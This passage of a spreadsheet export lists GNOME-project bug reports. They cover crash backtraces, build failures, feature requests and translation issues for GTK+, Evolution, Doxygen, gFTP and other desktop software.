#30 0xb7a4f0f7 in gtk_main_do_event () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#31 0xb78d87ea in _gdk_events_init () from /usr/lib/libgdk-x11-2.0.so.0
No symbol table info available.
#32 0xb76a2802 in g_main_context_dispatch () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#33 0xb76a57df in g_main_context_check () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#34 0xb76a5b89 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#35 0xb7a4f574 in gtk_main () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#36 0x0806306b in fe_main ()
No symbol table info available.
#37 0x080a0370 in main ()
No symbol table info available.
#0  0xffffe410 in __kernel_vsyscall ()</t>
  </si>
  <si>
    <t>serine</t>
  </si>
  <si>
    <t>GNUMERIC-497438</t>
  </si>
  <si>
    <t>change the setup to print in landscape mode is too complicated</t>
  </si>
  <si>
    <t>I had some problem to print in landscape mode with gnumeric on feisty. I try the same thing with with Gutsy and I was unable to change the page setup before to print. But thanks to Andreas Guelzow  he explain me how to do it : 
select page-setup
click on Change paper type
this opens a second dialog in which you can choose the orientation via radio buttons.
I think the method is very bad. It's too complex. When you want to print in landscape mode generally you are choosing it in the preview print mode or in the print mode but with gnumeric you have to choose with another menu. Perhaps it's me but I'm pretty sure that a lot of people will have a lot of problem with this and think that the software is too complex if you need to use different menus to configure a simple thing like this.
Other information:
This was reported on Launchpad: https://bugs.launchpad.net/ubuntu/+source/gnumeric/+bug/163154
by: https://bugs.launchpad.net/~humufr</t>
  </si>
  <si>
    <t>jerome.guelfucci</t>
  </si>
  <si>
    <t>GTK+-134312</t>
  </si>
  <si>
    <t>new gtkscale function breaks Solaris build</t>
  </si>
  <si>
    <t>gtk+ from CVS HEAD will not build on Solaris with the newly added gtkscale
function. There are two problems:
gtkhscale.c line 201: declaration hides parameter: scale
        declaration: pointer to struct _GtkScale {struct _GtkRange {..}
range int digits unsigned int draw_value :1 unsigned int value_pos :2}
        parameter  : pointer to struct _GtkScale {struct _GtkRange {..}
range int digits unsigned int draw_value :1 unsigned int value_pos :2}
gtkhscale.c line 251: void function cannot return value
cc: acomp failed for gtkhscale.c
make[4]: *** [gtkhscale.lo] Error 1
make[4]: Leaving directory
`/export/home/gnome/2.4/nightly/src-2.4-20040213/gtk+/gtk'
make[3]: *** [all-recursive] Error 1
make[3]: Leaving directory
`/export/home/gnome/2.4/nightly/src-2.4-20040213/gtk+/gtk'
make[2]: *** [all] Error 2
make[2]: Leaving directory
`/export/home/gnome/2.4/nightly/src-2.4-20040213/gtk+/gtk'
make[1]: *** [all-recursive] Error 1
make[1]: Leaving directory
`/export/home/gnome/2.4/nightly/src-2.4-20040213/gtk+'
make: *** [all] Error 2
these both occur in gtkhscale.c gtkvscale.c and gtkscale.c
I managed to get it to build by removing the GtkScale *scale declaration in
gtk_hscale_get_layout_offsets() (declared as parameter) and by removing
g_return_val_if_reached() calls. I realise this is destructive and not the
correct solution but it enables compilation for me at least.</t>
  </si>
  <si>
    <t>VALA-517748</t>
  </si>
  <si>
    <t>Bindings</t>
  </si>
  <si>
    <t>VALA</t>
  </si>
  <si>
    <t>add XDG UserDir and SpecialDir bindings</t>
  </si>
  <si>
    <t>Some functions related to XDG user dirs are missing in glib-2.0 vapi binding file.
The proposed patch follows.</t>
  </si>
  <si>
    <t>LIBWNCK-99361</t>
  </si>
  <si>
    <t>LIBWNCK</t>
  </si>
  <si>
    <t>panel crash</t>
  </si>
  <si>
    <t xml:space="preserve">Package: gnome-panel
Severity: critical
Version: GNOME2.1.2 2.1.2
Synopsis: panel crash
Bugzilla-Product: gnome-panel
Bugzilla-Component: clock applet
BugBuddy-GnomeVersion: 2.0 (2.1.2)
Description:
Description of Problem:
Panel crashed when I closed an application happens at similar times to
the gdk_event_filters bug but it has a different backtrace.
Debugging Information:
Backtrace was generated from '/gnome/head/INSTALL/bin/gnome-panel'
[New Thread 8192 (LWP 10911)]
0x420ae169 in wait4 () from /lib/i686/libc.so.6
#0  0x420ae169 in wait4 () from /lib/i686/libc.so.6
#1  0x4212a2d0 in __DTOR_END__ () from /lib/i686/libc.so.6
#2  0x4087ec63 in waitpid () from /lib/i686/libpthread.so.0
#3  0x4019c39a in libgnomeui_segv_handle (signum=11) at
gnome-ui-init.c:646
#4  0x4088047e in __pthread_sighandler () from
/lib/i686/libpthread.so.0
#5  
#6  g_type_check_instance_cast (type_instance=0x8351988
iface_type=1075047605)
    at gtype.c:265
#7  0x40137cce in set_item_text (mi=0x8351988 text=0x4013ecb5
Ma_ximize)
    at window-action-menu.c:147
#8  0x40137fdc in update_menu_state (amd=0x8381130) at
window-action-menu.c:213
#9  0x4098e888 in g_idle_dispatch (source=0x83a4b80
callback=0xfffffe00 
    user_data=0x8381130) at gmain.c:3164
#10 0x4098c113 in g_main_dispatch (context=0x80c51a8) at gmain.c:1653
#11 0x4098d011 in g_main_context_dispatch (context=0x80c51a8) at
gmain.c:2197
#12 0x4098d30f in g_main_context_iterate (context=0x80c51a8 block=1 
    dispatch=1 self=0x80b4010) at gmain.c:2278
#13 0x4098d95e in g_main_loop_run (loop=0x81efc88) at gmain.c:2498
#14 0x403a5ac7 in gtk_main () at gtkmain.c:1091
#15 0x0805ea7a in main (argc=9 argv=0xbffffc34) at main.c:216
#16 0x420158d4 in __libc_start_main () from /lib/i686/libc.so.6
Thread 1 (Thread 8192 (LWP 10911)):
#0  0x420ae169 in wait4 () from /lib/i686/libc.so.6
No symbol table info available.
#1  0x4212a2d0 in __DTOR_END__ () from /lib/i686/libc.so.6
No symbol table info available.
#2  0x4087ec63 in waitpid () from /lib/i686/libpthread.so.0
No symbol table info available.
#3  0x4019c39a in libgnomeui_segv_handle (signum=11) at
gnome-ui-init.c:646
	in_segv = 1
	pid = 0
#4  0x4088047e in __pthread_sighandler () from
/lib/i686/libpthread.so.0
No symbol table info available.
#5  
No symbol table info available.
#6  g_type_check_instance_cast (type_instance=0x8351988
iface_type=1075047605)
    at gtype.c:265
No locals.
#7  0x40137cce in set_item_text (mi=0x8351988 text=0x4013ecb5
Ma_ximize)
    at window-action-menu.c:147
No locals.
#8  0x40137fdc in update_menu_state (amd=0x8381130) at
window-action-menu.c:213
	actions = 0
#9  0x4098e888 in g_idle_dispatch (source=0x83a4b80
callback=0xfffffe00 
    user_data=0x8381130) at gmain.c:3164
No locals.
#10 0x4098c113 in g_main_dispatch (context=0x80c51a8) at gmain.c:1653
	i = 0
#11 0x4098d011 in g_main_context_dispatch (context=0x80c51a8) at
gmain.c:2197
No locals.
#12 0x4098d30f in g_main_context_iterate (context=0x80c51a8 block=1 
    dispatch=1 self=0x80b4010) at gmain.c:2278
	max_priority = 200
	timeout = 0
	some_ready = 1
	nfds = 15
	allocated_nfds = 1
	fds = (struct _GPollFD *) 0x82a0478
#13 0x4098d95e in g_main_loop_run (loop=0x81efc88) at gmain.c:2498
	self = (struct _GThread *) 0x80b4010
#14 0x403a5ac7 in gtk_main () at gtkmain.c:1091
	tmp_list = (struct _GList *) 0x0
	functions = (struct _GList *) 0x0
	init = (struct _GtkInitFunction *) 0x40012020
	loop = (struct _GMainLoop *) 0x81efc88
#15 0x0805ea7a in main (argc=9 argv=0xbffffc34) at main.c:216
No locals.
#16 0x420158d4 in __libc_start_main () from /lib/i686/libc.so.6
No symbol table info available.
#0  0x420ae169 in wait4 () from /lib/i686/libc.so.6
------- Bug moved to this database by unknown@bugzilla.gnome.org 2002-11-23 08:40 -------
Reassigning to the default owner of the component gnome-panel-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>libwnck-maint</t>
  </si>
  <si>
    <t>GNOME-VFS-147194</t>
  </si>
  <si>
    <t>Module: (other)</t>
  </si>
  <si>
    <t>sftp module crash</t>
  </si>
  <si>
    <t>I am trying to set up a ssh:// server in nautilus.  Each time I try I get a
dialog  saying: The action associated with ssh: acs.pha.jhu.edu is invalid.
and then nautilus immediately crashes.</t>
  </si>
  <si>
    <t>gnome-vfs-maint</t>
  </si>
  <si>
    <t>DOXYGEN-529758</t>
  </si>
  <si>
    <t>DOXYGEN</t>
  </si>
  <si>
    <t>.Net is not propery supported -_-</t>
  </si>
  <si>
    <t>Please describe the problem:
I just started using C++/CLI ... so i wrote my first small application using .NET
If i try to use doxygen with this project there are three bugs i encounter:
1.) Every class in .NET is inherited as public. So i don't have to write
class CNew : public COld. I it possible to loose the public!
Doxygen assumes prived inherence though
2.) After these lines:
//Forward-declaration of ISettingsKey and ISettingsSection to be able to
//declare the typedefs in the following line
interface class ISettingsKey
interface class ISettingsSection
//Typedefs of the iterators used by the SettingsClasses
typedef Collections::Generic::IEnumerator&gt; EnumKey
typedef Collections::Generic::IEnumerator&gt; EnumSection
Doxygen stops parsing the file.
If i comment them (i mean the typedefs) all works properly and the following classes will be documented
3.)
I have this inside a class:
/// @brief Used to query a key from the current section
property ISettingsKey^ default [String^]
{
    ISettingsKey^ get (String^ keyName)
}
/// @brief Used to query a key from the current section
property ISettingsKey^ default [String^ bool]
{
    ISettingsKey^ get (String^ keyName bool create)
}
bool Move (String^ newKeyName String^ oldKeyName)
Ouput in HTML:
ISettingsKey^ default[String^ 
] ISettingsKey^ default[String^ 
 bool] bool 	                 Move (String^ newKeyName String^ oldKeyName)
 	                         Used to query a key from the current section.
Doxygen can't cope with the [String^] @ the property declaration.
If i loose it the property is documented properly.
I hope you will fix that because i realy like your programm and i would love to continue using it!!
Plz help me!
Best regards!
Steps to reproduce:
1. 
2. 
3. 
Actual results:
Expected results:
Does this happen every time?
Other information:</t>
  </si>
  <si>
    <t>dimitri</t>
  </si>
  <si>
    <t>Xatian</t>
  </si>
  <si>
    <t>EVOLUTION-312989</t>
  </si>
  <si>
    <t>Evolution crashed while reading mails in preview pane</t>
  </si>
  <si>
    <t>Steps to reproduce:
1. Selected a mail to view it in the preview pane and evolution crashed.
I am haiving an imap account. From the traces it looks like probably it has
something to do with the attachment.
Stack trace:
(gdb) thread apply all bt
Thread 8 (Thread -173339728 (LWP 3687)):
#0  0x006807a2 in _dl_sysinfo_int80 () from /lib/ld-linux.so.2
#1  0x008dfac6 in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/tls/libpthread.so.0
#2  0xf6d05a3f in e_msgport_wait (mp=0x8e0ace8) at e-msgport.c:511
#3  0xf6d060c1 in thread_dispatch (din=0x8e0db78) at e-msgport.c:874
#4  0x008dd1d5 in start_thread () from /lib/tls/libpthread.so.0
#5  0x0075e2da in clone () from /lib/tls/libc.so.6
Thread 7 (Thread -184222800 (LWP 3688)):
#0  0x006807a2 in _dl_sysinfo_int80 () from /lib/ld-linux.so.2
#1  0x008dfac6 in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/tls/libpthread.so.0
#2  0xf6d05a3f in e_msgport_wait (mp=0x8eb4e60) at e-msgport.c:511
#3  0xf6d060c1 in thread_dispatch (din=0x8eb4fd8) at e-msgport.c:874
#4  0x008dd1d5 in start_thread () from /lib/tls/libpthread.so.0
#5  0x0075e2da in clone () from /lib/tls/libc.so.6
Thread 6 (Thread -196809808 (LWP 3689)):
#0  0x006807a2 in _dl_sysinfo_int80 () from /lib/ld-linux.so.2
#1  0x008dfac6 in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/tls/libpthread.so.0
---Type  to continue or q  to quit---
#2  0xf6d05a3f in e_msgport_wait (mp=0x8e0ace8) at e-msgport.c:511
#3  0xf6d060c1 in thread_dispatch (din=0x8e0db78) at e-msgport.c:874
#4  0x008dd1d5 in start_thread () from /lib/tls/libpthread.so.0
#5  0x0075e2da in clone () from /lib/tls/libc.so.6
Thread 5 (Thread -207299664 (LWP 3691)):
#0  0x006807a2 in _dl_sysinfo_int80 () from /lib/ld-linux.so.2
#1  0x008dfac6 in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/tls/libpthread.so.0
#2  0xf6d05a3f in e_msgport_wait (mp=0x8e0db28) at e-msgport.c:511
#3  0xf6d060c1 in thread_dispatch (din=0x8e0dad0) at e-msgport.c:874
#4  0x008dd1d5 in start_thread () from /lib/tls/libpthread.so.0
#5  0x0075e2da in clone () from /lib/tls/libc.so.6
Thread 4 (Thread -217900112 (LWP 3694)):
#0  0x006807a2 in _dl_sysinfo_int80 () from /lib/ld-linux.so.2
#1  0x008dfac6 in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/tls/libpthread.so.0
#2  0xf6d05a3f in e_msgport_wait (mp=0x8e0ac28) at e-msgport.c:511
#3  0xf6d060c1 in thread_dispatch (din=0x8e0abd0) at e-msgport.c:874
#4  0x008dd1d5 in start_thread () from /lib/tls/libpthread.so.0
#5  0x0075e2da in clone () from /lib/tls/libc.so.6
---Type  to continue or q  to quit---
Thread 3 (Thread -228389968 (LWP 3708)):
#0  0x006807a2 in _dl_sysinfo_int80 () from /lib/ld-linux.so.2
#1  0x008dfac6 in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/tls/libpthread.so.0
#2  0xf6d05a3f in e_msgport_wait (mp=0x92856f0) at e-msgport.c:511
#3  0xf5d6c809 in sync_op (emss=0xfffffffc op=7
    data=0xfffffffc  n=4294967292)
    at em-sync-stream.c:225
#4  0xf5d6c9da in stream_flush (stream=0x9106110) at em-sync-stream.c:299
#5  0xf6e70c5d in camel_stream_flush (stream=0x9106110) at camel-stream.c:136
#6  0xf5d5b732 in efh_format_do (mm=0x92a52f0) at em-format-html.c:1306
#7  0xf5d78dd5 in mail_msg_received (e=0x8e0db78 msg=0x92a52f0 data=0x0)
    at mail-mt.c:556
#8  0xf6d06054 in thread_dispatch (din=0x8e0db78) at e-msgport.c:826
#9  0x008dd1d5 in start_thread () from /lib/tls/libpthread.so.0
#10 0x0075e2da in clone () from /lib/tls/libc.so.6
Thread 2 (Thread -238879824 (LWP 3709)):
#0  0x006807a2 in _dl_sysinfo_int80 () from /lib/ld-linux.so.2
#1  0x008dfac6 in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/tls/libpthread.so.0
#2  0xf6d05a3f in e_msgport_wait (mp=0x8e0ace8) at e-msgport.c:511
#3  0xf6d060c1 in thread_dispatch (din=0x8e0db78) at e-msgport.c:874
---Type  to continue or q  to quit---
#4  0x008dd1d5 in start_thread () from /lib/tls/libpthread.so.0
#5  0x0075e2da in clone () from /lib/tls/libc.so.6
Thread 1 (Thread -166222144 (LWP 3664)):
#0  0x006807a2 in _dl_sysinfo_int80 () from /lib/ld-linux.so.2
#1  0x008e33fb in __waitpid_nocancel () from /lib/tls/libpthread.so.0
#2  0xf6c193ca in libgnomeui_segv_handle (signum=11) at gnome-ui-init.c:749
#3  
#4  IA__g_type_check_instance_cast (type_instance=0x91d1110
    iface_type=152923688) at gtype.c:318
#5  0xf5d58643 in efhd_attachment_button (efh=0x8ef0868 eb=0x90fb650
    pobject=0x91fe550) at em-format-html-display.c:1474
#6  0xf5d5a417 in efh_object_requested (html=0x8ef6158 eb=0x90fb650
    efh=0x8ef0868) at em-format-html.c:579
#7  0xf6cb0985 in html_g_cclosure_marshal_BOOLEAN__OBJECT (closure=0x8f04e18
    return_value=0xfee39680 n_param_values=2 param_values=0xfee396f0
    invocation_hint=0xfee395d8 marshal_data=0x0) at htmlmarshal.c:83
#8  0xf62b4fe9 in IA__g_closure_invoke (closure=0x8f04e18
    return_value=0xfee39680 n_param_values=2 param_values=0xfee396f0
    invocation_hint=0xfee395d8) at gclosure.c:437
#9  0xf62c8ff6 in signal_emit_unlocked_R (node=0x8ef1348 detail=0
    instance=0x8ef6158 emission_return=0xfee39680
    instance_and_params=0xfee396f0) at gsignal.c:2488
---Type  to continue or q  to quit---
#10 0xf62c9d66 in IA__g_signal_emit_valist (instance=0x8ef6158 signal_id=0
    detail=0 var_args=0xfee39880 \220\230ï¿½ï¿½ï¿½\nï¿½\bï¿½ï¿½{) at gsignal.c:2257
#11 0xf62ca280 in IA__g_signal_emit (instance=0x8ef6158 signal_id=301
    detail=0) at gsignal.c:2291
#12 0xf6c75e14 in html_engine_object_requested_cb (engine=0x8f03658
    eb=0x90fb650 data=0x8ef6158) at gtkhtml.c:521
#13 0xf6cb0985 in html_g_cclosure_marshal_BOOLEAN__OBJECT (closure=0x8f01600
    return_value=0xfee39ab0 n_param_values=2 param_values=0xfee39b20
    invocation_hint=0xfee39a08 marshal_data=0x0) at htmlmarshal.c:83
#14 0xf62b4fe9 in IA__g_closure_invoke (closure=0x8f01600
    return_value=0xfee39ab0 n_param_values=2 param_values=0xfee39b20
    invocation_hint=0xfee39a08) at gclosure.c:437
#15 0xf62c8ff6 in signal_emit_unlocked_R (node=0x8efa788 detail=0
    instance=0x8f03658 emission_return=0xfee39ab0
    instance_and_params=0xfee39b20) at gsignal.c:2488
#16 0xf62c9d66 in IA__g_signal_emit_valist (instance=0x8f03658 signal_id=0
    detail=0 var_args=0xfee39cb0 ï¿½\234ï¿½ï¿½ h\\t\005) at gsignal.c:2257
#17 0xf62ca280 in IA__g_signal_emit (instance=0x8f03658 signal_id=323
    detail=0) at gsignal.c:2291
#18 0xf6ca604f in element_parse_object (e=0x8f03658 clue=0x923ac20
    attr=0x91d1110 +) at htmlengine.c:1530
#19 0xf6c9f8b4 in parse_one_token (e=0x8f03658 clue=0x923ac20
    str=0x921c602 object
classid=\attachment.0x8eb5850.ZfPekGr412819.mixed.1\---Type  to
continue or q  to quit---
&gt;) at htmlengine.c:3741
#20 0xf6ca811f in html_engine_timer_event (e=0x8f03658) at htmlengine.c:1350
#21 0xf6ca81cd in html_engine_flush (e=0x8f03658) at htmlengine.c:6480
#22 0xf6c810ba in gtk_html_flush (html=0x2b) at gtkhtml.c:5811
#23 0xf5d5fa2f in emhs_sync_flush (stream=0x91d1110) at em-html-stream.c:127
#24 0xf5d6c6d4 in emcs_gui_received (source=0x91cf8c0 cond=G_IO_IN
    data=0x9106110) at em-sync-stream.c:161
#25 0xf6273d7f in g_io_unix_dispatch (source=0x91d7c10
    callback=0xf5d6c60c  user_data=0x9106110)
    at giounix.c:162
#26 0xf625026d in IA__g_main_context_dispatch (context=0x8d98570)
    at gmain.c:1934
#27 0xf6251b4b in g_main_context_iterate (context=0x8d98570 block=1
    dispatch=1 self=0x8d78560) at gmain.c:2565
#28 0xf6251dcc in IA__g_main_loop_run (loop=0x8e56798) at gmain.c:2769
#29 0xf6937081 in bonobo_main () at bonobo-main.c:395
#30 0x0805cc5b in main (argc=1 argv=0x8da0610) at main.c:602
(gdb)
Other information:</t>
  </si>
  <si>
    <t>sarfraaz</t>
  </si>
  <si>
    <t>GNOME-SHELL-693936</t>
  </si>
  <si>
    <t>shell-app-system: Ensure that we correctly order subsearches</t>
  </si>
  <si>
    <t>As a simple reproduction example type f then type i and quickly
delete it. Since we have the search timeout it turns out that we
actually make an initial search request for terms [f] and then
a subsearch request for [f]. The subsearch for equal terms is another
bug but the ordering here is something that could happen in
normal usage as well so we should fix it as well.</t>
  </si>
  <si>
    <t>GNOME-COMMON-445584</t>
  </si>
  <si>
    <t>GNOME-COMMON</t>
  </si>
  <si>
    <t>no args to configure warning with NOCONFIGURE</t>
  </si>
  <si>
    <t>The I am going to run 'configure' with no arguments. warning from gnome-autogen.sh doesn't make sense if NOCONFIGURE is defined.  Patch attached.</t>
  </si>
  <si>
    <t>gnome-common-maint</t>
  </si>
  <si>
    <t>GNOME-GAMES-SUPERSEDED-419159</t>
  </si>
  <si>
    <t>Improve gnibbles AI search algorithm</t>
  </si>
  <si>
    <t>The bug has been opened on https://launchpad.net/bugs/90907
Binary package hint: gnome-games
To really show the bug:
Change nibbles to level 15. (Can the up/down arrows only go in twos?)
Add the max number of AI players.
watch the ai players die games last around 2-3 seconds.
ProblemType: Bug
Architecture: i386
Date: Fri Mar 9 13:28:29 2007
DistroRelease: Ubuntu 7.04
...
It doesn't crash the game. It is a logic bug. The AI can't navigate through level 15.
The purple worm (bottom of the screen) Gets spawned and 9/10 times runs directly into a wall. AI needs to be a bit smarter.
Importance: Very very low.</t>
  </si>
  <si>
    <t>DOXYGEN-437346</t>
  </si>
  <si>
    <t>doxywizard</t>
  </si>
  <si>
    <t>Problem for creating RTF file for Japanese Language</t>
  </si>
  <si>
    <t>Please describe the problem:
I tried to create the RTF file by using doxygen but it failes to
create it when specifying the Japanese language.
Steps to reproduce:
(Using doxywizard)
1. Choose Japanese for OUTPUT_LANGUAGE in the Project tab.
2. Check GENERATE_RTF in the RTF tab.
3. Use the simple C source code file for input 
   (it doesn't include any Japanese characters)
--- source file ----
void	main( void )
{
	printf( Hello! World )
}
--------------------
4. After specifying Working directory push the Start button.
Actual results:
Doxygen produces the error below and the RTF file seems not correct.
======
Error: RTF integrity test failed at line 117 of D:/doxygen/rtf/refman.rtf due to a bracket mismatch.
       Please try to create a small code example that produces this error 
       and send that to dimitri@stack.nl.
*** Doxygen has finished
=====
Expected results:
Creating proper RTF file.
Does this happen every time?
Yes.
Other information:
When I see the 'wrong' RTF file I find a '}' character in the title string.
I think it may cause this problem.   ( like 83}\ )
== in RTF file ===================
{\title {\comment TEST \'83\'8A\'83t\'83@\'83\'8C\'83\'93\'83X\'83}\'83j\'83\'85\'83A\'83\'8B {\s17\sa60\sb30\widctlpar\qj \fs22\cgrid 
==================================
(This line is for Reference Manual in English)
If I choose Japanese-en for the OUTPUT_LANGUAGE it succeeds to create 
a RTF file.
my OS : Windows XP Professional SP2 (Japanese)</t>
  </si>
  <si>
    <t>metavd</t>
  </si>
  <si>
    <t>GNOME-CONTROL-CENTER-24999</t>
  </si>
  <si>
    <t>segfault when saving mime type</t>
  </si>
  <si>
    <t xml:space="preserve">Package:  control-center
Severity: critical
Version:  1.2.1
Synopsis: segfault when saving mime type
Class:    sw-bug
Distribution: Linux Mandrake release 7.0 (Air)
System: Linux 2.2.14-15mdk i586 unknown
C library: glibc-2.1.2-9mdk
C compiler: 2.95.2
glib: 1.2.8
GTK+: 1.2.8
ORBit: ORBit 0.5.3
gnome-libs: gnome-libs 1.2.4
libxml: 1.8.9
gnome-print: gnome-print-0.20
gnome-core: gnome-core 1.2.1
Description:
segfault when saving mime type
Debugging information:
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
0x40543fe9 in __wait4 () from /lib/libc.so.6
#0  0x40543fe9 in __wait4 () from /lib/libc.so.6
#1  0x405a4120 in ?? () from /lib/libc.so.6
#2  0x4015ed1a in gnome_segv_handle () from /usr/lib/libgnomeui.so.32
------- Bug moved to this database by debbugs-export@bugzilla.gnome.org 2001-01-27 16:39 -------
This bug was previously known as bug 24999 at http://bugs.gnome.org/
http://bugs.gnome.org/show_bug.cgi?id=24999
Originally filed under the control-center product and general component.
Unknown version 1.2.x in product control-center. Setting version to the default unspecified.
The original reporter (ntr@kittypuss.org) of this bug does not have an account here.
Reassigning to the exporter debbugs-export@bugzilla.gnome.org.
Reassigning to the default owner of the component bugmeister@canvas.gnome.org.
</t>
  </si>
  <si>
    <t>ntr</t>
  </si>
  <si>
    <t>LIBGNOME-326330</t>
  </si>
  <si>
    <t>don't make toolbars detachable by default</t>
  </si>
  <si>
    <t>I've mailed the gnome-cc list about that some time ago and it got no objection:
http://mail.gnome.org/archives/gnomecc-list/2005-December/msg00000.html</t>
  </si>
  <si>
    <t>GDK-PIXBUF-50242</t>
  </si>
  <si>
    <t>GDK-PIXBUF</t>
  </si>
  <si>
    <t>Remove gdk_pixbuf_init()</t>
  </si>
  <si>
    <t>gdk_pixbuf_init() currently just does g_type_init() we should get rid of
g_type_init() (already entered as a separate bug) and after that
remember to kill gdk_pixbuf_init.</t>
  </si>
  <si>
    <t>VTE-101112</t>
  </si>
  <si>
    <t>VTE</t>
  </si>
  <si>
    <t>Strange characters</t>
  </si>
  <si>
    <t>I'm using profterm with VTE and having problems when editing something
with vim or opening mail with mutt or so on. the problem I think is
a not correct termcap... but I can't make it work anyway.
You can see what I see here:
http://alfarrabio.di.uminho.pt/~albie/profterm_bug.png
And yes she is Heidi Klum :)</t>
  </si>
  <si>
    <t>vte-maint</t>
  </si>
  <si>
    <t>BOUNTIES-127526</t>
  </si>
  <si>
    <t>Ask user to make Evolution default mail app</t>
  </si>
  <si>
    <t>It would be nice if Evolution would prompt the user if he or she would like
to set Evolution as the default mailto: handler for GNOME if ot is the
first time the user has run Evolution and/or the default mailto handler
gconf setting is unset 
This bug is part of the Integrated Collaborative Desktop Bounty Hunt.  For
more information on prizes contest rules and other bounty tasks visit:
http://www.gnome.org/bounties/
If you would like to start working on this bounty please create a bugzilla
account and append your intention to work on this bounty to this bug.  If
multiple people declare their intentions to work on a task we encourage
you to join forces and work together.
Please do not close this bug.  The contest organizers will mark this bug as
FIXED when the prize is claimed.</t>
  </si>
  <si>
    <t>ulfjack</t>
  </si>
  <si>
    <t>GNOME-SUBTITLES-484231</t>
  </si>
  <si>
    <t>GNOME-SUBTITLES</t>
  </si>
  <si>
    <t>pl_PL (Polish) translation and issues</t>
  </si>
  <si>
    <t>Hello
I've made a polish translation for GNOME-Subtitles I would like you to include this in future releases:)
However there are few string that are untranslateable:
Replace toolbar button
Open and Close menu items from Video menu
Preferences menu item from Edit menu
Column headers from the GtkListView that contain subtitles
Shift timings and Adjust timings window titles
Program description from About dialog box
Don't know how to upload a file here so I'm giving a link:
http://dp0154.debowypark.waw.pl/gnome-subtitles/pl.po
Cheers
Tomasz SaÅ‚aciÅ„ski</t>
  </si>
  <si>
    <t>gnome-subtitles-maint</t>
  </si>
  <si>
    <t>tsalacinski</t>
  </si>
  <si>
    <t>GFTP-144155</t>
  </si>
  <si>
    <t>Problem with IPv6</t>
  </si>
  <si>
    <t>Connection to ::1 Port 21 User bwalle Pass ******
Changing to /test2 wanting to copy /test1.
Error:
-----------------------------------------------
250 OK. Current directory is /test
PASV
425 You cannot use PASV on IPv6 connections. Use EPSV instead.
Disconnecting from site ::1
------------------------------------------------
If I use 127.0.0.1 (IPv4) then everything works fine.</t>
  </si>
  <si>
    <t>ACCERCISER-416189</t>
  </si>
  <si>
    <t>ACCERCISER</t>
  </si>
  <si>
    <t>Accerciser Tab to move focus in interface viewer does not scroll panel</t>
  </si>
  <si>
    <t>We had the same problem in LSR's settings dialog when the contents of a panel gets too long. Steal the code from there and put it in the interface viewer. When I press Tab to move focus past the bottom/top of visible contents of the panel the panel should scroll to make the focus visible.</t>
  </si>
  <si>
    <t>eitan</t>
  </si>
  <si>
    <t>parente</t>
  </si>
  <si>
    <t>GAL-246447</t>
  </si>
  <si>
    <t>ETable</t>
  </si>
  <si>
    <t>GAL</t>
  </si>
  <si>
    <t>Contacts crash when adding new ones</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: critical
Version: GNOME2.2.2 1.4.3
os_details: Ximian Inc.
Synopsis: Contacts crash when adding new ones
Bugzilla-Product: Evolution
Bugzilla-Component: Shell
BugBuddy-GnomeVersion: 2.0 (2.2.0.1)
Description:
Description of Problem:
see above
Steps to reproduce the problem:
1. add a new contact or change an existing causes crashes most of the
time
2. 
3. 
Actual Results:
Expected Results:
How often does this happen?
most of the time
Additional Information:
Debugging Information:
Backtrace was generated from '/opt/gnome2/bin/evolution-1.4'
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...[New Thread 16384 (LWP 9193)]
[New Thread 32769 (LWP 9195)]
[New Thread 16386 (LWP 9196)]
[New Thread 32771 (LWP 9197)]
[New Thread 49156 (LWP 9198)]
[New Thread 65541 (LWP 9199)]
0x407c6d2a in waitpid ()
   from /lib/libpthread.so.0
#0  0x407c6d2a in waitpid () from /lib/libpthread.so.0
#1  0x40266fd2 in libgnomeui_module_info_get ()
   from /opt/gnome2/lib/libgnomeui-2.so.0
#2  0x0809b735 in evolution_storage_set_view_factory_new_view ()
#3  0x407c5895 in __pthread_sighandler () from /lib/libpthread.so.0
#4  
#5  0x4039d254 in e_table_item_redraw_range ()
   from /opt/gnome2/lib/libgal-2.0.so.3
#6  0x4037af0d in e_cell_text_set_value () from
/opt/gnome2/lib/libgal-2.0.so.3
#7  0x4037b117 in e_cell_text_set_value () from
/opt/gnome2/lib/libgal-2.0.so.3
#8  0x4037cbfd in e_cell_text_set_value () from
/opt/gnome2/lib/libgal-2.0.so.3
#9  0x4037501d in e_cell_leave_edit () from
/opt/gnome2/lib/libgal-2.0.so.3
#10 0x403a2e1b in e_table_item_leave_edit ()
   from /opt/gnome2/lib/libgal-2.0.so.3
#11 0x403a1716 in e_table_item_redraw_range ()
   from /opt/gnome2/lib/libgal-2.0.so.3
#12 0x4082b5c5 in gnome_canvas_marshal_BOOLEAN__BOXED ()
   from /opt/gnome2/lib/libgnomecanvas-2.so.0
#13 0x4126a525 in g_cclosure_new_swap () from
/usr/lib/libgobject-2.0.so.0
#14 0x4126a26b in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#15 0x4127e10e in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
#16 0x4127d2aa in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#17 0x4127d6fe in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
#18 0x40352cf5 in e_canvas_new () from /opt/gnome2/lib/libgal-2.0.so.3
#19 0x40352ea7 in e_canvas_new () from /opt/gnome2/lib/libgal-2.0.so.3
#20 0x40e3596c in _gtk_marshal_BOOLEAN__BOXED ()
   from /usr/lib/libgtk-x11-2.0.so.0
#21 0x4126a525 in g_cclosure_new_swap () from
/usr/lib/libgobject-2.0.so.0
#22 0x4126a26b in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#23 0x4127e10e in g_signal_emit_by_name () from
